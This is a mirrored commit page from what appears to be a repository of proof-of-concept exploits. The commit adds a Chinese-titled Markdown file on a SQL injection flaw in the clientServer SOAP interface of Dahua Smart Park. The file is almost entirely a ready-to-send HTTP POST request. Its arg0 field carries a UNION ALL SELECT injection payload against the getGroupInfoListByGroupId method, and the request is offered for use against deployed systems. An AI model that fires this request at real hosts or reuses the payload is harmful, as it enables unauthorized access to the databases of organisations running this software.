admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create 大华智慧园区clientServer接口SQL注入漏洞.md

Browse Source
This commit is contained in:
wy876 2024-03-12 18:34:45 +08:00 committed by GitHub
parent d4e4b35c10
commit 2dec8035c1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 22 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
大华智慧园区clientServer接口SQL注入漏洞.md Normal file
View File

@ -0,0 +1,22 @@
## 大华智慧园区clientServer接口SQL注入漏洞
## poc
```
POST /portal/services/clientServer HTTP/1.1
Host:xxx
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: text/xml;charset=UTF-8
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com">
<soapenv:Header/>
<soapenv:Body>
<cli:getGroupInfoListByGroupId>
<!--type: string-->
<arg0>-5398) UNION ALL SELECT 5336,5336,5336,5336,md5(123456)-- -</arg0>
<!--type: long-->
<arg1>10</arg1>
</cli:getGroupInfoListByGroupId>
</soapenv:Body>
</soapenv:E
```